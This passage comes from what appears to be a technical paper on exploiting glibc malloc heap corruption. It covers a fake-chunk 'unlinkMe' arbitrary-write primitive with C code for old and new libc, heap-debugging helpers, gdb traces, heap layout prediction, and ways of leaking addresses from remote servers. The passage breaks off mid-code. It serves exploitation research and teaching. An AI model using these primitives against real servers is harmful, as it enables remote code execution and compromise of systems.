+We avoid the backward consolidation, as we set the PREV_INUSE bit.
+
+3294      if (!(inuse_bit_at_offset(next, nextsz)))   
+                /* consolidate forward */
+
+But we force a forward consolidation. The inuse_bit_at_offset() macro adds
+nextsz (-4) to our nasty chunk's address, and looks for the PREV_INUSE bit
+in our other -4 size.
+
+3296        sz += nextsz;
+3298        if (!islr && next->fd == last_remainder(ar_ptr))
+3306          unlink(next, bck, fwd);
+
+unlink() is called with our supplied values: 0xbffffef8 and 0xbfffff00 as
+forward and backward pointers (it does not crash, as they are valid
+addresses).
+
+             next = chunk_at_offset(p, sz);
+3315      set_head(p, sz | PREV_INUSE);
+3316      next->prev_size = sz;
+3317      if (!islr) {
+3318        frontlink(ar_ptr, p, sz, idx, bck, fwd);
+
+fronlink() is called and our chunk is inserted in the proper bin. 
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049a40 - top size = 0x05c0
+   bin 126 @ 0x40018430
+      free_chunk @ 0x80498d8 - size 0xfffffd64
+
+The chunk was inserted into one of the bigger bins... as a consequence of
+its 'negative' size. 
+The process won't crash if we are able to maintain this state. If more
+calls to free() hit our chunk, it won't crash. But it will crash in case a
+malloc() call does not find any free chunk to satisfy the allocation
+requirement and tries to split one of the bins in the bin number 126, as
+it will try to calculate where is the chunk after the fake one, getting
+out of the valid address range because of the big 'negative' size (this
+may not happen in a scenario where there is enough memory allocated
+between the fake chunk and the top chunk, forcing this layout is not very
+difficult when the target server does not impose tight limits to our
+requests size).
+
+We can check the results of the aa4bmo primitive:
+
+(gdb) x/20x 0xbfffff00
+
+                                !!!!!!!!!!                      !!!!!!!!!!
+0xbfffff00:     0xbfffff00      0x414c0065      0x653d474e      0xbffffef8
+0xbfffff10:     0x6f73692e      0x39353838      0x53003531      0x415f4853
+0xbfffff20:     0x41504b53      0x2f3d5353      0x2f727375      0x6562696c
+0xbfffff30:     0x2f636578      0x6e65706f      0x2f687373      0x6d6f6e67
+0xbfffff40:     0x73732d65      0x73612d68      0x7361706b      0x4f480073
+
+
+If we add some bogus calls to free() in the following way:
+
+   for(i=0;i<5;i++) free(unlinkMe+SOMEOFFSET);
+
+we obtain the following result for example:
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
+   bin 126 @ 0x40018430
+      free_chunk @ 0x8049958 - size 0x8049958
+      free_chunk @ 0x8049954 - size 0xfffffd68
+      free_chunk @ 0x8049928 - size 0xfffffd94
+      free_chunk @ 0x8049820 - size 0x40018430
+      free_chunk @ 0x80499c4 - size 0xfffffcf8
+      free_chunk @ 0x8049818 - size 0xfffffea4
+
+without crashing the process.
+
+--] 4.1.2 New unlinkMe chunk
+
+Changes introduced in newer libc versions (glibc-2.3 for example) affect
+our unlinkMe chunk. The main problem for us is related to the addition of
+one flag bit more. SIZE_BITS definition was modified, from:
+
+#define SIZE_BITS (PREV_INUSE|IS_MMAPPED)
+
+to:
+
+#define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA)
+
+The new flag, NON_MAIN_ARENA is defined like this:
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+
+This makes our previous unlinkMe chunk to fail in two different points in
+systems using a newer libc.
+
+Our first problem is located within the following code:
+
+public_fREe(Void_t* mem)
+{
+...
+  ar_ptr = arena_for_chunk(p);
+...
+  _int_free(ar_ptr, mem);
+...
+
+where:
+
+#define arena_for_chunk(ptr) \
+ (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
+
+and 
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+If heap_for_ptr() is called when processing our fake chunk, the process
+crashes in the following way:
+
+0x42074a04 in free () from /lib/i686/libc.so.6
+1: x/i $eip  0x42074a04 <free+84>:      and    $0x4,%edx
+(gdb) x/20x $edx
+0xffffffdd:     Cannot access memory at address 0xffffffdd
+
+0x42074a07 in free () from /lib/i686/libc.so.6
+1: x/i $eip  0x42074a07 <free+87>:      je     0x42074a52 <free+162>
+
+0x42074a09 in free () from /lib/i686/libc.so.6
+1: x/i $eip  0x42074a09 <free+89>:      and    $0xfff00000,%eax
+
+0x42074a0e in free () from /lib/i686/libc.so.6
+1: x/i $eip  0x42074a0e <free+94>:      mov    (%eax),%edi
+(gdb) x/x $eax
+0x8000000:      Cannot access memory at address 0x8000000
+
+Program received signal SIGSEGV, Segmentation fault.
+0x42074a0e in free () from /lib/i686/libc.so.6
+1: x/i $eip  0x42074a0e <free+94>:      mov    (%eax),%edi
+
+So, the fake chunk size has to have its NON_MAIN_ARENA flag not set.
+
+
+Then, our second problem takes places when the supplied size is masked
+with the SIZE_BITS. Older code looked like this:
+
+      nextsz = chunksize(next);
+0x400152e2 <chunk_free+64>:        mov    0x4(%edx),%ecx
+0x400152e5 <chunk_free+67>:        and    $0xfffffffc,%ecx
+
+and new code is:
+
+      nextsize = chunksize(nextchunk);
+0x42073fe0 <_int_free+112>:     mov    0x4(%ecx),%eax
+0x42073fe3 <_int_free+115>:     mov    %ecx,0xffffffec(%ebp)
+0x42073fe6 <_int_free+118>:     mov    %eax,0xffffffe4(%ebp)
+0x42073fe9 <_int_free+121>:     and    $0xfffffff8,%eax
+
+So, we can't use -4 anymore, the smaller size we can provide is -8.
+Also, we are not able anymore to make every chunk to point to our nasty
+chunk. The following code shows our new unlinkMe chunk which solves both
+problems:
+
+unsigned long *aa4bmoPrimitive(unsigned long what, 
+                               unsigned long where,unsigned long sz){
+   unsigned long *unlinkMe;
+   int i=0;
+
+   if(sz<13) sz = 13;
+   unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
+    // 1st nasty chunk
+   unlinkMe[i++] = -4;    // PREV_INUSE is not set
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = what;
+   unlinkMe[i++] = where-8;
+    // 2nd nasty chunk
+   unlinkMe[i++] = -4; // PREV_INUSE is not set
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = what;
+   unlinkMe[i++] = where-8;
+   for(;i<sz;i++)
+      if(i%2)
+            // relative negative offset to 1st nasty chunk
+         unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
+      else
+            // relative negative offset to 2nd nasty chunk
+         unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
+
+   free(unlinkMe+SOMEOFFSET(sz));
+   return unlinkMe;
+}
+
+The process is similar to the previously explained for the first unlinkMe
+chunk version. Now, we are using two nasty chunks, in order to be able to
+point every chunk to one of them. Also, we added a -4 (PREV_INUSE flag not
+set) before each of the nasty chunks, which is accessed in step 3 of the
+'4.1.1 First unlinkMe chunk' section, as -8 is the smaller size we can
+provide.
+
+This new version of the unlinkMe chunk works both in older and newer libc
+versions. Along the article most proof of concept code uses the first
+version, replacing the aa4bmoPrimitive() function is enough to obtain an
+updated version.
+
+---------------------------------------------------------------------------
+--] 4.2 Heap layout analysis
+
+You may want to read the 'Appendix I - malloc internal structures
+overview' section before going on.
+Analysing the targeted process heap layout and its evolution allows to
+understand what is happening in the process heap in every moment, its
+state, evolution, changes... etc. This allows to predict the allocator
+behavior and its reaction to each of our inputs.
+Being able to predict the heap layout evolution, and using it to our
+advantage is extremely important in order to obtain a reliable
+exploit.
+To achieve this, we'll need to understand the allocation behavior of
+the process (i.e. if the process allocates large structures for each
+connection, if lots of free chunks/heap holes are generated by a
+specific command handler, etc), which of our inputs may be used to
+force a big/small allocation, etc.
+We must pay attention to every use of the malloc routines, and
+how/where we might be able to influence them via our input so
+that a reliable situation is reached.
+For example, in a double free() vulnerability scenario, we know the
+second free() call (trying to free already freed memory), will
+probably crash the process. Depending on the heap layout evolution
+between the first free() and the second free(), the portion of memory
+being freed twice may: have not changed, have been reallocated several
+times, have been coalesced with other chunks or have been overwritten and
+freed.
+
+The main factors we have to recognize include:
+
+A] chunk size: does the process allocate big memory chunks? is our 
+   input stored in the heap? what commands are stored in the heap?
+   is there any size limit to our input? am I able to force a heap
+    top (top_chunk) extension?
+B] allocation behavior: are chunks allocated for each of our
+    connections? what size? are chunks allocated periodically? are
+   chunks freed periodically? (i.e. async garbage collector, cache
+    pruning, output buffers, etc)
+C] heap holes: does the process leave holes? when? where? what size?
+   can we fill the hole with our input? can we force the overflow
+   condition in this hole? what is located after the hole? are we
+   able to force the creation of holes?
+D] original heap layout: is the heap layout predictable after process
+   initialization? after accepting a client connection? (this is 
+   related to the server mode)
+
+During our tests, we use an adapted version of a real malloc
+implementation taken from the glibc, which was modified to generate
+debugging output for each step of the allocator's algorithms, plus three
+helper functions added to dump the heap layout and state.
+This allows us to understand what is going on during exploitation, the
+actual state of the allocator internal structures, how our input affects
+them, the heap layout, etc.
+Here is the code of the functions we'll use to dump the heap state:
+
+static void
+#if __STD_C
+heap_dump(arena *ar_ptr)
+#else
+heap_dump(ar_ptr) arena *ar_ptr;
+#endif
+{
+  mchunkptr p;
+
+  fprintf(stderr,"\n--- HEAP DUMP ---\n");
+  fprintf(stderr,
+            "            ADDRESS   SIZE               FD            BK\n");
+
+  fprintf(stderr,"sbrk_base %p\n",
+          (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) & 
+            ~MALLOC_ALIGN_MASK));
+
+  p = (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
+                  ~MALLOC_ALIGN_MASK);
+
+  for(;;) {
+    fprintf(stderr, "chunk     %p 0x%.4x", p, (long)p->size);
+
+    if(p == top(ar_ptr)) {
+      fprintf(stderr, " (T)\n");
+      break;
+    } else if(p->size == (0|PREV_INUSE)) {
+      fprintf(stderr, " (Z)\n");
+      break;
+    }
+
+    if(inuse(p))
+       fprintf(stderr," (A)");
+    else
+       fprintf(stderr," (F) | 0x%8x | 0x%8x |",p->fd,p->bk);
+
+    if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr)))
+       fprintf(stderr," (LR)");
+    else if(p->fd==p->bk & ~inuse(p))
+       fprintf(stderr," (LC)");
+
+    fprintf(stderr,"\n");
+    p = next_chunk(p);
+  }
+  fprintf(stderr,"sbrk_end  %p\n",sbrk_base+sbrked_mem);
+}
+
+
+
+static void
+#if __STD_C
+heap_layout(arena *ar_ptr)
+#else
+heap_layout(ar_ptr) arena *ar_ptr;
+#endif
+{
+  mchunkptr p;
+
+  fprintf(stderr,"\n--- HEAP LAYOUT ---\n");
+
+  p = (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) &
+                  ~MALLOC_ALIGN_MASK);
+
+  for(;;p=next_chunk(p)) {
+    if(p==top(ar_ptr)) {
+       fprintf(stderr,"|T|\n\n");
+       break;
+    }
+    if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) {
+       fprintf(stderr,"|L|");
+       continue;
+    }
+    if(inuse(p)) {
+       fprintf(stderr,"|A|");
+       continue;
+    }
+       fprintf(stderr,"|%lu|",bin_index(p->size));
+       continue;
+    }
+  }
+}
+
+
+
+static void
+#if __STD_C
+bin_dump(arena *ar_ptr)
+#else
+bin_dump(ar_ptr) arena *ar_ptr;
+#endif
+{
+  int i;
+  mbinptr b;
+  mchunkptr p;
+
+  fprintf(stderr,"\n--- BIN DUMP ---\n");
+
+  (void)mutex_lock(&ar_ptr->mutex);
+
+  fprintf(stderr,"arena @ %p - top @ %p - top size = 0x%.4x\n",
+         ar_ptr,top(ar_ptr),chunksize(top(ar_ptr)));
+
+  for (i = 1; i < NAV; ++i)
+  {
+    char f = 0;
+    b = bin_at(ar_ptr, i);
+    for (p = last(b); p != b; p = p->bk)
+    {
+      if(!f){
+         f = 1;
+         fprintf(stderr,"   bin %d @ %p\n",i,b);
+      }
+      fprintf(stderr,"      free_chunk @ %p - size 0x%.4x\n",
+             p,chunksize(p));
+    }
+  (void)mutex_unlock(&ar_ptr->mutex);
+  fprintf(stderr,"\n");
+}
+
+
+
+--] 4.2.1 Proof of concept 2: Heap layout debugging
+
+We'll use the following code to show how the debug functions help to
+analyse the heap layout:
+
+#include <malloc.h>
+int main(void){
+        void *curly,*larry,*moe,*po,*lala,*dipsi,*tw,*piniata;
+        curly = malloc(256);
+        larry = malloc(256);
+        moe = malloc(256);
+        po = malloc(256);
+        lala = malloc(256);
+        free(larry);
+        free(po);
+        tw = malloc(128);
+        piniata = malloc(128);
+        dipsi = malloc(1500);
+        free(dipsi);
+        free(lala);
+}
+
+The sample debugging section helps to understand malloc's basic
+algorithms and data structures:
+
+(gdb) set env LD_PRELOAD ./heapy.so
+
+We override the real malloc with our debugging functions, heapy.so also
+includes the heap layout dumping functions.
+
+(gdb) r
+Starting program: /home/jp/cerebro/heapy/debugging_sample
+
+4               curly = malloc(256);
+
+[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
+    extended top chunk:
+        previous size 0x0
+        new top 0x80496a0 size 0x961
+        returning 0x8049598 from top chunk
+
+(gdb) p heap_dump(0x40018040)
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0961 (T)
+sbrk_end  0x804a000
+
+(gdb) p bin_dump(0x40018040)
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x80496a0 - top size = 0x0960
+
+(gdb) p heap_layout(0x40018040)
+
+--- HEAP LAYOUT ---
+|A||T|
+
+The first chunk is allocated, note the difference between the requested
+size (256 bytes) and the size passed to chunk_alloc(). As there is no
+chunk, the top needs to be extended and memory is requested to the
+operating system. More memory than the needed is requested, the remaining
+space is allocated to the 'top chunk'. 
+In the heap_dump()'s output the (A) represents an allocated chunk, while
+the (T) means the chunk is the top one. Note the top chunk's size (0x961)
+has its last bit set, indicating the previous chunk is allocated:
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use
+ */
+
+#define PREV_INUSE 0x1UL
+
+The bin_dump()'s output shows no bin, as there is no free chunk yet,
+except from the top. The heap_layout()'s output just shows an allocated
+chunk next to the top.
+
+
+
+5               larry = malloc(256);
+
+[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
+    returning 0x80496a0 from top chunk
+    new top 0x80497a8 size 0x859
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0109 (A)
+chunk     0x80497a8 0x0859 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x80497a8 - top size = 0x0858
+
+--- HEAP LAYOUT ---
+|A||A||T|
+
+A new chunk is allocated from the remaining space at the top chunk. The
+same happens with the next malloc() calls.
+
+
+
+6               moe = malloc(256);
+
+[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
+    returning 0x80497a8 from top chunk
+    new top 0x80498b0 size 0x751
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0109 (A)
+chunk     0x80497a8 0x0109 (A)
+chunk     0x80498b0 0x0751 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x80498b0 - top size = 0x0750
+
+--- HEAP LAYOUT ---
+|A||A||A||T|
+
+
+
+7               po = malloc(256);
+
+[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
+    returning 0x80498b0 from top chunk
+    new top 0x80499b8 size 0x649
+ 
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0109 (A)
+chunk     0x80497a8 0x0109 (A)
+chunk     0x80498b0 0x0109 (A)
+chunk     0x80499b8 0x0649 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x80499b8 - top size = 0x0648
+
+--- HEAP LAYOUT ---
+|A||A||A||A||T|
+
+
+
+8               lala = malloc(256);
+
+[1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264)
+    returning 0x80499b8 from top chunk
+    new top 0x8049ac0 size 0x541
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0109 (A)
+chunk     0x80497a8 0x0109 (A)
+chunk     0x80498b0 0x0109 (A)
+chunk     0x80499b8 0x0109 (A)
+chunk     0x8049ac0 0x0541 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
+
+--- HEAP LAYOUT ---
+|A||A||A||A||A||T|
+
+
+
+9               free(larry);
+[1679] FREE(0x80496a8) - CHUNK_FREE(0x40018040,0x80496a0)
+    fronlink(0x80496a0,264,33,0x40018148,0x40018148) new free chunk
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC)
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0109 (A)
+chunk     0x80499b8 0x0109 (A)
+chunk     0x8049ac0 0x0541 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
+   bin 33 @ 0x40018148
+      free_chunk @ 0x80496a0 - size 0x0108
+
+--- HEAP LAYOUT ---
+|A||33||A||A||A||T|
+
+A chunk is freed. The frontlink() macro is called to insert the new free
+chunk into the corresponding bin:
+
+frontlink(ar_ptr, new_free_chunk, size, bin_index, bck, fwd);
+
+Note the arena address parameter (ar_ptr) was omitted in the output.
+In this case, the chunk at 0x80496a0 was inserted in the bin number 33
+according to its size. As this chunk is the only one in its bin (we can
+check this in the bin_dump()'s output), it's a lonely chunk (LC) (we'll
+see later that being lonely makes 'him' dangerous...), its
+bk and fd pointers are equal and point to the bin number 33.
+In the heap_layout()'s output, the new free chunk is represented by the
+number of the bin where it is located.
+
+
+
+10              free(po);
+
+[1679] FREE(0x80498b8) - CHUNK_FREE(0x40018040,0x80498b0)
+    fronlink(0x80498b0,264,33,0x40018148,0x80496a0) new free chunk
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0109 (F) | 0x40018148 | 0x080498b0 |
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0109 (F) | 0x080496a0 | 0x40018148 |
+chunk     0x80499b8 0x0108 (A)
+chunk     0x8049ac0 0x0541 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
+   bin 33 @ 0x40018148
+      free_chunk @ 0x80496a0 - size 0x0108
+      free_chunk @ 0x80498b0 - size 0x0108
+
+--- HEAP LAYOUT ---
+|A||33||A||33||A||T|
+
+Now, we have two free chunks in the bin number 33. We can appreciate now
+how the double linked list is built. The forward pointer of the chunk at
+0x80498b0 points to the other chunk in the list, the backward pointer
+points to the list head, the bin.
+Note that there is no longer a lonely chunk. Also, we can see the
+difference between a heap address and a libc address (the bin address),
+0x080496a0 and 0x40018148 respectively.
+
+
+
+11              tw = malloc(128);
+
+[1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136)
+    unlink(0x80496a0,0x80498b0,0x40018148) from big bin 33 chunk 1 (split)
+    new last_remainder 0x8049728
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0089 (A)
+chunk     0x8049728 0x0081 (F) | 0x40018048 | 0x40018048 | (LR)
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC)
+chunk     0x80499b8 0x0108 (A)
+chunk     0x8049ac0 0x0541 (T)
+sbrk_end  0x804a000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
+   bin 1 @ 0x40018048
+      free_chunk @ 0x8049728 - size 0x0080
+   bin 33 @ 0x40018148
+      free_chunk @ 0x80498b0 - size 0x0108
+
+--- HEAP LAYOUT ---
+|A||A||L||A||33||A||T|
+
+In this case, the requested size for the new allocation is smaller than
+the size of the available free chunks. So, the first freed buffer is taken
+from the bin with the unlink() macro and splitted. The first part is
+allocated, the remaining free space is called the 'last remainder', which
+is always stored in the first bin, as we can see in the bin_dump()'s
+output.
+In the heap_layout()'s output, the last remainder chunk is represented
+with a L; in the heap_dump()'s output, (LR) is used.
+
+
+
+12              piniata = malloc(128);
+
+[1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136)
+    clearing last_remainder
+    frontlink(0x8049728,128,16,0x400180c0,0x400180c0) last_remainder
+    unlink(0x80498b0,0x40018148,0x40018148) from big bin 33 chunk 1 (split)
+    new last_remainder 0x8049938
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0089 (A)
+chunk     0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC)
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0089 (A)
+chunk     0x8049938 0x0081 (F) | 0x40018048 | 0x40018048 | (LR)
+chunk     0x80499b8 0x0108 (A)
+chunk     0x8049ac0 0x0541 (T)
+sbrk_end  0x804a000
+$25 = void
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540
+   bin 1 @ 0x40018048
+      free_chunk @ 0x8049938 - size 0x0080
+   bin 16 @ 0x400180c0
+      free_chunk @ 0x8049728 - size 0x0080
+
+
+--- HEAP LAYOUT ---
+|A||A||16||A||A||L||A||T|
+
+As the last_remainder size is not enough for the requested allocation, the
+last remainder is cleared and inserted as a new free chunk into the
+corresponding bin. Then, the other free chunk is taken from its bin and
+split as in the previous step.
+
+
+
+13              dipsi = malloc(1500);
+
+[1679] MALLOC(1500) - CHUNK_ALLOC(0x40018040,1504)
+    clearing last_remainder
+    frontlink(0x8049938,128,16,0x400180c0,0x8049728) last_remainder
+    extended top chunk: 
+        previous size 0x540
+        new top 0x804a0a0 size 0xf61
+        returning 0x8049ac0 from top chunk
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0089 (A)
+chunk     0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 |
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0089 (A)
+chunk     0x8049938 0x0081 (F) | 0x08049728 | 0x400180c0 |
+chunk     0x80499b8 0x0108 (A)
+chunk     0x8049ac0 0x05e1 (A)
+chunk     0x804a0a0 0x0f61 (T)
+sbrk_end  0x804b000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x804a0a0 - top size = 0x0f60
+   bin 16 @ 0x400180c0
+      free_chunk @ 0x8049728 - size 0x0080
+      free_chunk @ 0x8049938 - size 0x0080
+
+--- HEAP LAYOUT ---
+|A||A||16||A||A||16||A||A||T|
+
+As no available free chunk is enough for the requested allocation size,
+the top chunk was extended again.
+
+
+
+14              free(dipsi);
+
+[1679] FREE(0x8049ac8) - CHUNK_FREE(0x40018040,0x8049ac0)
+    merging with top
+    new top 0x8049ac0
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0089 (A)
+chunk     0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 |
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0089 (A)
+chunk     0x8049938 0x0081 (F) | 0x 8049728 | 0x400180c0 |
+chunk     0x80499b8 0x0108 (A)
+chunk     0x8049ac0 0x1541 (T)
+sbrk_end  0x804b000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x1540
+   bin 16 @ 0x400180c0
+      free_chunk @ 0x8049728 - size 0x0080
+      free_chunk @ 0x8049938 - size 0x0080
+
+--- HEAP LAYOUT ---
+|A||A||16||A||A||16||A||T|
+
+The chunk next to the top chunk is freed, so it gets coalesced with it,
+and it is not inserted in any bin.
+
+
+
+15              free(lala);
+
+[1679] FREE(0x80499c0) - CHUNK_FREE(0x40018040,0x80499b8)
+    unlink(0x8049938,0x400180c0,0x8049728) for back consolidation
+    merging with top
+    new top 0x8049938
+
+--- HEAP DUMP ---
+            ADDRESS   SIZE               FD           BK
+sbrk_base 0x8049598
+chunk     0x8049598 0x0109 (A)
+chunk     0x80496a0 0x0089 (A)
+chunk     0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC)
+chunk     0x80497a8 0x0108 (A)
+chunk     0x80498b0 0x0089 (A)
+chunk     0x8049938 0x16c9 (T)
+sbrk_end  0x804b000
+
+--- BIN DUMP ---
+arena @ 0x40018040 - top @ 0x8049938 - top size = 0x16c8
+   bin 16 @ 0x400180c0
+      free_chunk @ 0x8049728 - size 0x0080
+
+--- HEAP LAYOUT ---
+|A||A||16||A||A||T|
+
+Again, but this time also the chunk before the freed chunk is coalesced, as
+it was already free.
+
+---------------------------------------------------------------------------
+--] 4.3 - Layout reset - initial layout prediction - server model
+
+In this section, we analyse how different scenarios may impact on the
+exploitation process.
+In case of servers that get restarted, it may be useful to cause a 'heap
+reset', which means crashing the process on purpose in order to obtain a 
+clean and known initial heap layout.
+The new heap that gets built together with the new restarted process is
+in its 'initial layout'. This refers to the initial state of the heap
+after the process initialization, before receiving any input from the 
+user. The initial layout can be easily predicted and used as a the known
+starting point for the heap layout evolution prediction, instead of using
+a not virgin layout result of several modifications performed while
+serving client requests. This initial layout may not vary much across
+different versions of the targeted server, but in case of major changes in
+the source code.
+One issue very related to the heap layout analysis is the kind of process
+being exploited.
+In case of a process that serves several clients, heap layout evolution
+prediction is harder, as may be influenced by other clients that may be
+interacting with our target server while we are trying to exploit it.
+However, it gets useful in case where the interaction between the server
+and the client is very restricted, as it enables the attacker to  open
+multiple connections to affect the same process with different input
+commands.
+On the other hand, exploiting a one client per process server (i.e. a
+forking server) is easier, as long as we can accurately predict the
+initial heap layout and we are able to populate the process memory in
+a fully controlled way.
+As it is obvious, a server that does not get restarted, gives us just one
+shot so, for example, bruteforcing and/or 'heap reset' can't be applied.
+
+---------------------------------------------------------------------------
+--] 4.4 Obtaining information from the remote process
+
+The idea behind the techniques in this section is to force a remote
+server to give us information to aid us in finding the memory locations
+needed for exploitation. 
+This concept was already used as different mechanisms in the 'Bypassing
+PaX ASLR' paper [13], used to bypass randomized space address processes.
+Also, the idea was suggested in [4], as 'transforming a write primitive in
+a read primitive'.
+
+--] 4.4.1 Modifying server static data - finding process' DATA
+
+This technique was originally seen in wuftpd ~{ exploits. When the ftpd
+process receives a 'help' request, answers with all the available commands.
+These are stored in a table which is part of the process' DATA, being a
+static structure. The attacker tries to overwrite part of the structure,
+and using the 'help' command until he sees a change in the server's answer.
+
+Now the attacker knows an absolute address within the process' DATA, being
+able to predict the location of the process' GOT.
+
+--] 4.4.2 Modifying user input - finding shellcode location
+
+The following technique allows the attacker to find the exact location of
+the injected shellcode within the process' address space, being
+independent of the target process.
+To obtain the address, the attacker provides the process with some bogus
+data, which is stored in some part of the process. Then, the basic
+primitive is used, trying to write 4 bytes in the location the bogus
+data was previously stored. After this, the server is forced to reply
+using the supplied bogus data.
+If the replayed data differs from the original supplied (taken into account
+any transformation the server may perform on our input), we can be sure
+that next time we send the same input sequence to the server, it will be
+stored in the same place. The server's answer may be truncated if a
+function expecting NULL terminating strings is used to craft it, or to
+obtain the answer's length before sending it through the network.
+In fact, the provided input may be stored multiple times in different
+locations, we will only detect a modification when we hit the location
+where the server reply is crafted.
+Note we are able to try two different addresses for each connection, 
+speeding up the bruteforcing mechanism.
+The main requirement needed to use this trick, is being able to trigger
+the aa4bmo primitive between the time the supplied data is stored and the
+time the server's reply is built. Understanding the process allocation
+behavior, including how is processed each available input command is
+needed.
+
+--] 4.4.2.1 Proof of concept 3 : Hitting the output
+
+The following code simulates a process which provides us with a aa4bmo
+primitive to try to find where a heap allocated output buffer is located:
+
+
+#include <stdio.h>
+#define SZ           256
+#define SOMEOFFSET   5 + (rand() % (SZ-1))
+#define PREV_INUSE   1
+#define IS_MMAP      2
+#define OUTPUTSZ     1024
+
+void aa4bmoPrimitive(unsigned long what, unsigned long where){
+   unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
+   int i = 0;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = what;
+   unlinkMe[i++] = where-8;
+   for(;i<SZ;i++){
+      unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
+   }
+   free(unlinkMe+SOMEOFFSET);
+   return;
+}
+
+int main(int argc, char **argv){
+   long where;
+   char *output;
+   int contador,i;
+
+   printf("## OUTPUT hide and seek ##\n\n");
+   output = (char*)malloc(OUTPUTSZ);
+   memset(output,'O',OUTPUTSZ);
+
+   for(contador=1;argv[contador]!=NULL;contador++){
+      where = strtol(argv[contador], (char **)NULL, 16);
